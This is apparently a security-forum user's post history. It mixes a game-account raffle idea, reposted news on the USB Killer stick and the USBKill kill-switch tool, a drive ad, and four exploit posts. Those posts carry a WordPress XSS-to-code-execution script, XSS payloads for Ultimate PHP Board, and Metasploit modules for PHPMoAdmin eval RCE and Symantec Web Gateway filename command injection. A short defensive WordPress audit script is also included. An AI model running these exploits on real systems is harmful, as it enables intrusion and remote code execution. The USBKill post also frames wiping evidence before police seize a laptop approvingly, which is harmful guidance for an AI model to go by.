Posts posted by kp112

  1. @theandruala

    Some money was invested in them, which is why I want to recover at least the investment made!

    @yoyois

    How could it be a scam, given that the draw will be LIVE and the database of everyone registered in the raffle/ticket will be public?

    The chances of recovering the accounts are minimal, for 2 reasons:

    1. The phone numbers on the accounts get changed

    2. The e-mail addresses can be changed!

    If you have another idea for eliminating the possibility of a SCAM, I'm waiting for an idea by which I can give them away and recover at least the investment made in the accounts!

  2. Hello
    First of all, HAPPY HOLIDAYS with your loved ones, RST <:-P

    I own a few PERSONAL accounts for certain games and I thought I'd sell them, since I've been keeping them for nothing for almost 2 years; maybe someone will enjoy them!

    The idea of what I'd like to do is as follows:
    A site where you create an account so you can buy tickets
    (example) 1 ticket costs 15 lei, which generates a code like F28C2RKJ7 or numbers from 1 - 1000000 (they can be bought in unlimited/limited numbers for more chances)
    All the codes are collected in a database, and after a certain period I draw the winning numbers LIVE with random.org or with something else

    Does anyone have an idea about a plugin for the site?

  3. whoever knows Russian :))

    @tqcsu - USBKill — Code That Kills Computers Before They Examine USBs for Secrets is different from This 'Killer USB' can make your Computer explode [read the content carefully]

    and I posted This 'Killer USB' can make your Computer explode in Romanian and in English for foreigners!

    you're dreaming of spam!

    logically it should work

    in practice, we'll see :))

    I've started digging deeper to see what I can find :)


  4. Exploit that uses a WordPress cross site scripting flaw to execute code as the administrator.

    /*
    Author: @evex_1337
    Title: Wordpress XSS to RCE
    Description: This Exploit Uses XSS Vulnerabilities in Wordpress
    Plugins/Themes/Core To End Up Executing Code After Being Triggered With
    Administrator Privileged User. ¯\_(ツ)_/¯
    Reference: http://research.evex.pw/?vuln=14
    Enjoy.

    */
    //Installed Plugins Page
    plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
    'plugins.php' : 'wp-admin/plugins.php';
    //Inject "XSS" Div
    jQuery('body').append('<div id="xss" ></div>');
    xss_div = jQuery('#xss');
    xss_div.hide();
    //Get Installed Plugins Page Source and Append it to "XSS" Div
    jQuery.ajax({
    url: plugins,
    type: 'GET',
    async: false,
    cache: false,
    timeout: 30000,
    success: function (txt) {
    xss_div.html(txt);
    }
    });
    //Put All Plugins Edit URL in Array
    plugins_edit = [
    ];
    xss_div.find('a').each(function () {
    if (jQuery(this).attr('href').indexOf('?file=') != - 1) {
    plugins_edit.push(jQuery(this).attr('href'));
    }
    });
    //Inject Payload
    for (var i = 0; i < plugins_edit.length; i++) {
    jQuery.ajax({
    url: plugins_edit[i],
    type: 'GET',
    async: false,
    cache: false,
    timeout: 30000,
    success: function (txt) {
    xss_div.html(txt);
    _wpnonce =
    jQuery('form#template').context.body.innerHTML.match('name="_wpnonce"
    value="(.*?)"') [1];
    old_code = jQuery('form#template div textarea#newcontent') [0].value;
    payload = '<?php phpinfo(); ?>';
    new_code = payload + '\n' + old_code;
    file = plugins_edit[i].split('file=') [1];
    jQuery.ajax({
    url: plugins_edit[i],
    type: 'POST',
    data: {
    '_wpnonce': _wpnonce,
    'newcontent': new_code,
    'action': 'update',
    'file': file,
    'submit': 'Update File'
    },
    async: false,
    cache: false,
    timeout: 30000,
    success: function (txt) {
    xss_div.html(txt);
    if (jQuery('form#template div textarea#newcontent')
    [0].value.indexOf(payload) != - 1) {
    // Passed, this is up to you ( skiddies Filter )
    injected_file = window.location.href.split('wp-admin') [0] +
    '/wp-content/plugins/' + file; //
    [url]http://localhost/wp//wp-content/plugins/504-redirects/redirects.php[/url]
    throw new Error('');
    }
    }
    });
    }
    });
    }

    Source : WordPress 4.2.1 XSS / Code Execution
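
The script in the post above depends on a logged-in administrator's browser being able to reach the built-in plugin editor and save PHP into a plugin file. As an added defensive example (not part of the original post or the exploit author's code), this Python audit checks whether wp-config.php disables the editor with DISALLOW_FILE_EDIT or DISALLOW_FILE_MODS, and flags plugin files that begin with a one-line PHP block followed by a second opening tag, the shape left when code is prepended to an existing file. All sample file contents and plugin paths are constructed.

```python
import re

# Constructed wp-config.php fragments (not from any real site).
WP_CONFIG_DEFAULT = """<?php
define('DB_NAME', 'wp');
// define('DISALLOW_FILE_EDIT', true);
/* define('DISALLOW_FILE_EDIT', true); */
"""
WP_CONFIG_HARDENED = """<?php
define('DB_NAME', 'wp');
define( 'DISALLOW_FILE_EDIT', true );
"""

# Constructed plugin sources: an untouched file and the same file with a
# one-line PHP block prepended, as the posted script does with its payload.
PLUGIN_CLEAN = """<?php
/*
Plugin Name: Example Plugin
*/
function example_plugin_init() {}
"""
PLUGIN_TAMPERED = "<?php phpinfo(); ?>\n" + PLUGIN_CLEAN

BLOCK_COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)
# An active define() at the start of a line; "//" and "#" comments never match.
DEFINE_RE = re.compile(
    r"""^[ \t]*define\(\s*['"]DISALLOW_FILE_(?:EDIT|MODS)['"]\s*,\s*true\s*\)\s*;""",
    re.IGNORECASE | re.MULTILINE,
)
# Complete "<?php ... ?>" on the first line, then a second opening tag.
PREPENDED_RE = re.compile(
    r"\A\s*(<\?php\b[^\n]*?\?>)[ \t]*\r?\n\s*<\?php\b", re.IGNORECASE
)


def editor_disabled(wp_config_text):
    """True if wp-config.php actively disables the plugin/theme editor."""
    without_block_comments = BLOCK_COMMENT_RE.sub("", wp_config_text)
    return DEFINE_RE.search(without_block_comments) is not None


def prepended_block(php_source):
    """Return the leading one-line PHP block if one precedes the real file."""
    match = PREPENDED_RE.match(php_source)
    return match.group(1) if match else None


def audit(wp_config_text, plugin_sources):
    """plugin_sources maps a plugin-relative path to the file's text."""
    suspects = {}
    for path, source in sorted(plugin_sources.items()):
        block = prepended_block(source)
        if block is not None:
            suspects[path] = block
    return {
        "editor_disabled": editor_disabled(wp_config_text),
        "suspect_files": suspects,
    }


if __name__ == "__main__":
    report = audit(
        WP_CONFIG_DEFAULT,
        {"example-a/example-a.php": PLUGIN_TAMPERED,
         "example-b/example-b.php": PLUGIN_CLEAN},
    )
    print("editor disabled:", report["editor_disabled"])
    for path, block in report["suspect_files"].items():
        print("prepended block in", path, "->", block)
```

The prepended-block check is a heuristic; comparing plugin files against the checksums of the released package is the stronger integrity check.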

  5. USB sticks have become universal storage media over the last ten years. They are used worldwide by anyone who needs to move files from one computer to another or to store important data away from hackers and from any problems that might arise on the source PC. Well, a hardware enthusiast from Russia has developed USB Killer, a USB stick that can destroy any computer it is plugged into. The worrying part is that it looks like any ordinary stick.

    Although we have no proof that this device really works, and there is no commercial version of it, the description of how it works is fairly convincing. Its creator has not yet decided whether he wants to release the stick's technical specifications freely or try to make some money from it through crowdfunding, but he is considering both options.

    The "troublemaker" stick works like an inverter. It draws power from the USB port and charges the capacitors to -110 V. When this voltage is reached, the inverter is switched off and the transistor opens. This pushes the negative charge to the USB port. The process is repeated until all the components in the computer that can still supply the USB with power have been burned out by the device.

    For the moment there is not much cause for concern. Most PC users already know that it is not advisable to use USB sticks from dubious sources. The device exists only in the hands of its creator, who has said he does not see many practical applications for it. The USB Killer has even been compared to a nuclear bomb: it is good to have such a stick in your possession, but it is not advisable to actually use it.

    Source: USB Killer: a stick that can destroy any PC

  6. USBkill — A new program that once activated, will instantly disable the laptop or computer if there is any activity on USB port.

    Hey, wait: don’t compare USBkill with the USB Killer stick that destroys sensitive components of a computer when plugged in.

    "USBKill" is a new weapon that could be a boon for whistleblowers, journalists, activists, and even cyber criminals who want to keep their information away from police and cyber thieves.

    It is like, if you are caught, kill yourself. In the same fashion as terrorists do.

    Here I am not talking about killing yourself, but about killing the data on your laptop if law enforcement has caught your laptop.

    USBkill does exactly this by turning a thumb drive into a kill switch that if unplugged, forces systems to shut down.

    Hephaestos (@h3phaestos), the author of USBkill, reports that the tool will help prevent users from becoming the next Ross Ulbricht, founder of the infamous underground drug marketplace Silk Road, who was arrested in a 2013 FBI raid in which his laptop was seized by law enforcement agencies.

    "USBKill waits for a change on your USB ports, then immediately kills your computer," a Github document states.

    Completely Wipe up any pieces of evidence before Feds caught you:

    Generally, the kind of activities on USB port include the police installing a mouse jiggler – a tool that prevents computer systems from going to sleep, and any USB drive being removed from the computer.

    "If this happens you would like your computer to shut down immediately," Hephaestos says. Simply tie a flash USB key to your ankle, and instantly start USBkill when the police or any other law enforcement official catches you with a laptop.

    In case, they steal or take your laptop or computer with them, they would definitely remove the USB drive that will immediately shut down your laptop.

    The author of USBkill states that the program could be very effective when running on a virtual machine, which would vanish when you reboot.

    The author says that USBKill will be added to additional commands and functions. However, it does work correctly and efficiently in its current state as well.

    Source: USBKill — Code That Kills Computers Before They Examine USBs for Secrets

  7. Can Hackers turn a remote computer into a bomb and explode it to kill someone, just like they do in hacker movies? Wait, wait! Before answering that, Let me tell you an interesting story about Killer USB drive:

    A man walking in the subway stole a USB flash drive from the outer pocket of someone else's bag. The pendrive had "128" written on it. After coming home, he inserted the pendrive into his laptop and instead discovering any useful data, he burnt half of his laptop down. The man then took out the USB pendrive, replaced the text "128" with "129" and put it in the outer pocket of his bag… Amen!

    I’m sure you would really not imagine yourself being the 130th victim of this Killer pendrive, and neither would I.

    This above story was told to a Russian researcher, nicknamed Dark Purple, who found the concept very interesting and developed his own computer-frying USB Killer pendrive.

    He is working with an electronics manufacturing company, from where he ordered some circuit boards from China for creating his own USB killer stick.

    "When we connect it up to the USB port, an inverting DC/DC converter runs and charges capacitors to -110V," the researcher explained. "When the voltage is reached, the DC/DC is switched off. At the same time, the field transistor opens."


    At last, he successfully developed a well functioning USB killer pendrive which is able to effectively destroy sensitive components of a computer when plugged-in.

    "It is used to apply the -110V to signal lines of the USB interface. When the voltage on capacitors increases to -7V, the transistor closes and the DC/DC starts. The loop runs till everything possible is broken down. Those familiar with the electronics have already guessed why we use negative voltage here."

    It is not possible for hardware to prevent all damage to physical systems in some scenarios. It may be possible for an attacker to exploit SCADA vulnerabilities and remove safety controls used by power plants or put it into an unstable state.

    The Stuxnet worm is one of the real examples of such cyber attacks, which was designed to destroy centrifuges at the Nuclear facility, and all this started from a USB drive.

    Also in 2014, a security firm demonstrated an attack on Apple’s Mac computer by overriding temperature controls, which can actually set the machine on fire.

    So if we say that a computer could be converted into a bomb, then of course it’s true, a hacker can probably make your computer explode as well.

    Therefore, next time when you find an unknown USB flash drive, just beware before inserting it into your laptop. Because this time it will not fire up your important files or data stored on your laptop like what malwares do, instead it will fire up your Laptop.

    Source : This 'Killer USB' can make your Computer explode

    Original Source Russian : USB killer

  8. 1 x 2TB USB Thumb drive. (2TB = 2,000GB)

    Note: This drive can hold up to 1000 x HD Movies

    Note: Do not buy a big, power hungry external HDD

    Note: USB Thumb drives do not have moving parts like HDD...more reliable

    Note: Plug into your Smart-TV and play directly (Note some TV cannot read too high memory size)

    Note: Use as backup for your entire PC/Laptop HDD and more!

    Note: Save pounds/kgs from your backpack....leave your HDD at home!

    Brand new. Not opened. (We may check before sending if required)

    High speed read speed USB-2: 18 Mb/S

    High speed write speed USB-2: 15 Mb/s

    Storage life of over 10 years.

    Equipment Compatibility: PC/Laptop/Tablets/SmartTV/Routers/Media Servers

    Operating systems: Windows 7, 8, 8.1

    To read and read in high speed

    Plug and Play

    Support USB zip and Disk Boot

  9. Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting

    Ultimate PHP Board (UPB) version 2.2.7 suffers from a cross site scripting vulnerability.

    # Exploit Title   : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability
    # CVE : CVE-2015-2217
    # Date : 4 March 2015
    # Exploit Author : CWH Underground
    # Discovered By : ZeQ3uL
    # Site : www.2600.in.th
    # Vendor Homepage : http://www.myupb.com
    # Software Link : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip
    # Version : 2.2.7


    ####################
    SOFTWARE DESCRIPTION
    ####################

    Ultimate PHP Board is completely text based, making it easy for anybody who has access to PHP to run a message board of their own without the need for MySQL.

    ####################################
    DESCRIPTION FOR CROSS SITE SCRIPTING
    ####################################

    myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

    An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
    This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

    myUPB 2.2.7 is vulnerable; other versions may also be affected.

    ####################
    VULNERABILITY DETAIL
    ####################

    1. Reflect Cross Site Scripting (search.php)
    POC:
    /search.php?q='><script>alert(1)</script>

    2. Stored Cross Site Scripting (profile.php)
    POC:
    POST /upb/profile.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/upb/profile.php
    Cookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------287611866431947
    Content-Length: 716
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_email"
    t@t.com
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_loca"
    th
    -----------------------------287611866431947
    Content-Disposition: form-data; name="avatar"
    images/avatars/chic.jpg'><script>alert("hacked");</script>
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_site"
    http://
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_timezone"
    0
    -----------------------------287611866431947
    Content-Disposition: form-data; name="u_edit"
    Submit
    -----------------------------287611866431947--

    ################################################################################################################
    Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
    ################################################################################################################

    Source

  10. PHPMoAdmin 1.1.2 Remote Code Execution

    This Metasploit module exploits an arbitrary PHP command execution vulnerability due to a dangerous use of eval() in PHPMoAdmin.

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'


    class Metasploit4 < Msf::Exploit::Remote

    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
    super(update_info(info,
    'Name' => 'PHPMoAdmin 1.1.2 Remote Code Execution',
    'Description' => %q{
    This module exploits an arbitrary PHP command execution vulnerability due to a
    dangerous use of eval() in PHPMoAdmin.
    },
    'Author' =>
    [
    'Pichaya Morimoto pichaya[at]ieee.org', # Public PoC
    'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
    ],
    'License' => MSF_LICENSE,
    'References' =>
    [
    [ 'CVE', '2015-2208' ],
    [ 'EDB', '36251' ],
    [ 'URL', 'http://seclists.org/fulldisclosure/2015/Mar/19' ],
    [ 'URL', 'http://seclists.org/oss-sec/2015/q1/743' ]
    ],
    'Privileged' => false,
    'Platform' => 'php',
    'Arch' => ARCH_PHP,
    'Targets' =>
    [
    [ 'PHPMoAdmin', { } ],
    ],
    'DisclosureDate' => 'Mar 03 2015',
    'DefaultTarget' => 0))

    register_options(
    [
    OptString.new('TARGETURI', [true, "The URI path of the PHPMoAdmin page", "/"])
    ], self.class)
    end

    def check
    testrun = Rex::Text::rand_text_alpha(10)
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri,'moadmin.php'),
    'method' => 'POST',
    'vars_post' =>
    {
    'object' => "1;echo '#{testrun}';exit",
    }
    })

    if res and res.body.include?(testrun)
    return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
    end

    def exploit

    print_status("Executing payload...")

    res = send_request_cgi({
    'uri' => normalize_uri(target_uri,'moadmin.php'),
    'method' => 'POST',
    'vars_post' =>
    {
    'object' => "1;eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
    }
    })

    end
    end

    Source

  11. This Metasploit module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator.

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info={})
    super(update_info(info,
    'Name' => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection",
    'Description' => %q{
    This module exploits a command injection vulnerability found in Symantec Web
    Gateway's setting restoration feature. The filename portion can be used to inject
    system commands into a syscall function, and gain control under the context of
    HTTP service.

    For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user.
    However, for version 5.2.1, you must be an administrator.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Egidio Romano', # Original discovery & assist of MSF module
    'sinn3r'
    ],
    'References' =>
    [
    [ 'CVE', '2014-7285' ],
    [ 'OSVDB', '116009' ],
    [ 'BID', '71620' ],
    [ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ],
    [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00']
    ],
    'Payload' =>
    {
    'Compat' =>
    {
    'PayloadType' => 'cmd',
    'RequiredCmd' => 'generic python'
    }
    },
    'DefaultOptions' => {
    'RPORT' => 443,
    'SSL' => true,
    'SSLVersion' => 'TLS1'
    },
    'Platform' => ['unix'],
    'Arch' => ARCH_CMD,
    'Targets' =>
    [
    ['Symantec Web Gateway 5', {}]
    ],
    'Privileged' => false,
    'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014)
    'DefaultTarget' => 0))

    register_options(
    [
    OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']),
    OptString.new('USERNAME', [true, 'The username to login as']),
    OptString.new('PASSWORD', [true, 'The password for the username'])
    ], self.class)
    end

    def protocol
    ssl ? 'https' : 'http'
    end

    def check
    uri = target_uri.path
    res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')})

    if res && res.body.include?('Symantec Web Gateway')
    return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
    end

    def get_sid
    sid = ''

    uri = target_uri.path
    res = send_request_cgi({
    'uri' => normalize_uri(uri, 'spywall/login.php'),
    'method' => 'GET',
    })

    unless res
    fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID')
    end

    cookies = res.get_cookies
    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''

    sid
    end

    def login(sid)
    uri = target_uri.path
    res = send_request_cgi({
    'uri' => normalize_uri(uri, 'spywall/login.php'),
    'method' => 'POST',
    'cookie' => sid,
    'headers' => {
    'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}"
    },
    'vars_post' => {
    'USERNAME' => datastore['USERNAME'],
    'PASSWORD' => datastore['PASSWORD'],
    'loginBtn' => 'Login'
    }
    })

    unless res
    fail_with(Failure::Unknown, 'Connection timed out while attempting to login')
    end

    cookies = res.get_cookies
    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''

    if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank?
    # Successful login
    return sid
    else
    # Failed login
    fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    end
    end

    def build_payload
    # At of today (Feb 27 2015), there are only three payloads this module will support:
    # * cmd/unix/generic
    # * cmd/unix/reverse_python
    # * cmd/unix/reverse_python_ssl
    p = payload.encoded

    case datastore['PAYLOAD']
    when /cmd\/unix\/generic/
    # Filter that one out, Mr. basename()
    p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
    p = "python -c \"exec('#{p}'.decode('base64'))\""
    else
    p = p.gsub(/python -c "exec/, 'python -c \\"exec')
    p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"")
    end

    p
    end

    def build_mime
    p = build_payload

    data = Rex::MIME::Message.new
    data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"')
    data.add_part('maintenance', nil, nil, 'form-data; name="configuration"')
    data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""')
    data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"')
    data.add_part('', nil, nil, 'form-data; name="restore"')
    data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"")
    data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"')
    data.add_part('0', nil, nil, 'form-data; name="event_horizon"')
    data.add_part('0', nil, nil, 'form-data; name="max_events"')
    data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"')
    data.add_part('', nil, nil, 'form-data; name="testaddress"')
    data.add_part('', nil, nil, 'form-data; name="pingaddress"')
    data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"')
    data.add_part('', nil, nil, 'form-data; name="capture_filter"')

    data
    end

    def inject_exec(sid)
    uri = target_uri.path
    mime = build_mime # Payload inside
    send_request_cgi({
    'uri' => normalize_uri(uri, 'spywall/restore.php'),
    'method' => 'POST',
    'cookie' => sid,
    'data' => mime.to_s,
    'ctype' => "multipart/form-data; boundary=#{mime.bound}",
    'headers' => {
    'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}"
    }
    })
    end

    def save_cred(username, password)
    service_data = {
    address: rhost,
    port: rport,
    service_name: protocol,
    protocol: 'tcp',
    workspace_id: myworkspace_id
    }

    credential_data = {
    module_fullname: self.fullname,
    origin_type: :service,
    username: username,
    private_data: password,
    private_type: :password
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
    core: credential_core,
    last_attempted_at: DateTime.now,
    status: Metasploit::Model::Login::Status::SUCCESSFUL
    }.merge(service_data)

    create_credential_login(login_data)
    end

    def exploit
    print_status("Getting the PHPSESSID...")
    sid = get_sid
    if sid.blank?
    print_error("Failed to get the session ID. Cannot continue with the login.")
    return
    end

    print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    sid = login(sid)
    if sid.blank?
    print_error("Failed to get the session ID from the login process. Cannot continue with the injection.")
    return
    else
    # Good password, keep it
    save_cred(datastore['USERNAME'], datastore['PASSWORD'])
    end

    print_status("Trying restore.php...")
    inject_exec(sid)
    end

    end

    Source
